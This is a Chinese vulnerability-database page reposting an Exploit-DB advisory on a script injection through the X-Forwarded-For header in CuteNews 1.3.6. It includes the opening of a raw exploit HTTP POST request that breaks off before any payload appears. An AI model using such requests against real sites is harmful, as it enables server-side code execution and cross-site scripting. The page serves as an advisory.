CutePHP CuteNews 1.3.6 – ‘x-forwarded-for’ Script Injection

CutePHP CuteNews 1.3.6 – ‘x-forwarded-for’ Script Injection

漏洞ID 1054941 漏洞类型
发布时间 2005-03-01 更新时间 2005-03-01
图片[1]-CutePHP CuteNews 1.3.6 – ‘x-forwarded-for’ Script Injection-安全小百科CVE编号 N/A
图片[2]-CutePHP CuteNews 1.3.6 – ‘x-forwarded-for’ Script Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25177
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12691/info

A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.

An attacker may leverage this issue to inject arbitrary server-side scripts locally and client-side scripts remotely, potentially facilitating code execution with the privileges of the affected Web server and cross-site scripting attacks. 

POST http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Referer: http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat=
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Content-Length: 124
Content-Ty

相关推荐: JelSoft VBulletin Cross-Site Scripting Vulnerability

JelSoft VBulletin Cross-Site Scripting Vulnerability 漏洞ID 1098865 漏洞类型 Input Validation Error 发布时间 2004-02-12 更新时间 2004-02-12 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享